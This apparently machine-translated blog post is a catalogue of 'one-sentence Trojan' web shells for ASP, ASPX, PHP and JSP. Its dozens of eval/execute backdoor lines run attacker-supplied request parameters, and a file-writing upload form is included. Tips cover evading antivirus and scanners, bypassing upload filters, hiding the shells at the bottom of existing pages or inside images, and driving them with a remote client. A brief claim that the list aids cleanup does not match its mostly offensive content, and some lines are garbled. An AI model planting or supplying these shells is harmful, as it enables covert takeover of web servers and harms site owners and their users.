A variety of words Trojan horse Daquan

Keywords: PHP Session Javascript JSP

Today, with the development of the Internet, various levels of program use emerge at the right time, not paying attention to security, resulting in a lot of websites are hanging horses (virtual host is now a disaster area). Such a saying that the back door is the hacker's favorite, good concealment, here to share the code to you, you can find and clean through search tools.

<%eval request("c")%> 
<%execute request("c")%> 
<%ExecuteGlobal request("sb")%> 
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 
'Backup dedicated
'Unguarded download table, prevented download table break through a special sentence.
<%execute request("c")%><%<%loop<%:%> 
<%<%loop<%:%><%execute request("c")%> 
<%execute request("c")<%loop<%:%> 
'Anti-killing and Anti-sweeping special purpose
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%> 
'No need'<,>"
<script language=VBScript runat=server>execute request("c")</script> 
<% @Language= "JavaScript" CodePage= "65001" var lcx= {name': Request.form('#'),'gender': eval,'age':'18','nickname':'Please call me boss'}; lcx. gender ((lcx.
Name) +'%>.
<script language=vbs runat=server>eval(request("c"))</script> 
<script language=vbs runat=server>eval_r(request("c"))</script> 
'No double quotation marks.
<%eval request(chr(35))%> 
'Can evade Leike Map.
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject 

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%> 
'Fault-tolerant code
if Request("sb")<>"" then ExecuteGlobal request("sb") end if 
PHP sentence

<?php eval($_POST1);?> 
<?php if(isset($_POST['c'])){eval($_POST['c']);}?> 
<?php system($_REQUEST1);?> 
<?php ($_=@$_GET1).@$_($_POST1)?> 
<?php eval_r($_POST1)?> 
<?php @eval_r($_POST1)?>//Fault tolerant code 
<?php assert($_POST1);?>//Use Lanker to execute related PHP statements in client-side expert mode 
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*After using this, using the kitchen knife, the client enters in the "Configuration" column when configuring the connection.*/:<O>h=@eval_r($_POST1);</O> 
<?php echo `$_GET['r']` ?> 
//A sentence that bypasses the restriction 
<script language="php">@eval_r($_POST[sb])</script> 
JSP sentence

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%> 
//Submit client 
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="Submission"></form> 
ASPX In a word 
<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script> 

//Add a few more:

//It is recommended to add a sentence to the picture. 
//Ordinary php sentence: <? php @eval ($_POST['r00ts']);> 
//Common asp sentence: <% Eval (Request. Item ["r00ts"], "unsafe";%> 
aspx Breakthrough first-class: 
dim da 
set fso=server.createobject("scripting.filesystemobject") 
if path<>"" then 
set da=fso.createtextfile(path,true) 
da.write data 
if err=0 then 
Response.Write "yes" 
Response.Write "no" 
end if 
end if 
set da=nothing 
set fos=nothing 
Response.Write "<form action=" method=post>" 
Response.Write "<input type=text name=path>" 
Response.Write "<br>" 
Response.Write "Current file path:"&server.mappath(request.servervariables("script_name")) 
Response.Write "<br>" 
Response.Write "The operating system is:"&Request.ServerVariables("OS") 
Response.Write "<br>" 
Response.Write "WEB The server version is:"&Request.ServerVariables("SERVER_SOFTWARE") 
Response.Write "<br>" 
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>" 
Response.Write "<br>" 
Response.Write "<input type=submit value=save>" 
Response.Write "</form>" 
ASP sentence: <% IfRequest ("1")<>"The nExecute Global (Request ("1")%>.

PHP anti-killing sweep sentence: <? PHP (])?>.
The above sentence is anti-killing and anti-sweeping! Few people use it online! It can be inserted at the bottom of any ASP file on the page without error, such as
index.asp is also possible!  

Because judgment is added! Add a judgment PHP sentence, the same as the above ASP sentence, but also can be inserted in any PHP file.
No mistakes at the bottom! <? If (isset ($_POST ['1']){eval ($_POST ['1']);}?> <? PHP system

Unguarded download table, download table can try to insert the following sentence breakthrough.
<%execute request("class")%><%'<% loop <%:%><%'<% loop <%:%><%execute request 
("class")%><%execute request("class")'<% loop <%:%> 

Backup dedicated <% Eval (request ("1"): response.end%>.

asp sentence <% execute (request ("1")%>.
aspx sentence: <scriptrunat="server">WebAdmin2Y.x.y aaa= new WebAdmin2Y.x.y

You can avoid a sentence from Leiketu.  
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1″) 

No'<, >'asp sentence < scriptrunat = server > execute request ("1")</script>.

A sentence without double quotation marks. <% Eval request (chr (35)%>

Posted by meburke on Tue, 21 May 2019 13:28:09 -0700